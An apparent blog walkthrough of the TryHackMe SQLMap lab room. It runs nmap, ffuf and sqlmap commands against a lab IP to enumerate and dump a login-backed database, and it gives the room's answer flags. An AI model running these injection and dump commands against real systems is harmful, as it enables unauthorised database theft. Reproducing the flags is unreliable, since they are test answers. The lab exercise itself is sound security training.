TryHackMe SQLMap Room

3 weeks ago 30
BOOK THIS SPACE FOR AD
ARTICLE AD

Joshua_sk

Hello Everyone! In this post, we’ll explore how to leverage sqlmap for automated SQL injection vulnerability scanning. We’ll be following along with a TryHackMe learning module to guide you through the process

IP target: 10.10.162.245$ sudo nmap -Pn 10.10.162.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 00:39 EDT
Nmap scan report for 10.10.162.245
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 4.56 seconds

Open port 80 : httpOpen web browser: http://10.10.162.245
$ ffuf -u http://10.10.162.245/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt/boold: this is a interesting directoryOpen web browser: http://10.10.162.245/blood
Go to login pageOpen Burp Suite and login account admin:admin
Save this information to a file name login.txt$ sqlmap -r login.txt --current-user
[01:11:55] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'

$ sqlmap -r login.txt -dbs
available databases [6]:
[*] blood
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] test

$ sqlmap -r login.txt -D blood --tables
Database: blood
[3 tables]
+----------+
| blood_db |
| flag |
| users |
+----------+

$ sqlmap -r login.txt -D blood -T flag --columns
Database: blood
Table: flag
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| name | varchar(30) |
| flag | varchar(50) |
| id | int(10) |
+--------+-------------+

$ sqlmap -r login.txt -D blood -T flag --dump
Database: blood
Table: flag
[1 entry]
+----+---------------------+--------+
| id | flag | name |
+----+---------------------+--------+
| 1 | thm{sqlm@p_is_L0ve} | flag |
+----+---------------------+--------+

1.What is the name of the interesting directory ?

Answer: blood

2.Who is the current db user ?

Answer: root

3.What’s is the final flag ?

Answer: thm{sqlm@p_is_L0ve}

Remember! Hacking is illegle you can not hacking people or company without permission. This blog post is made for educational only. So you can learn and practice by your own place.

Read Entire Article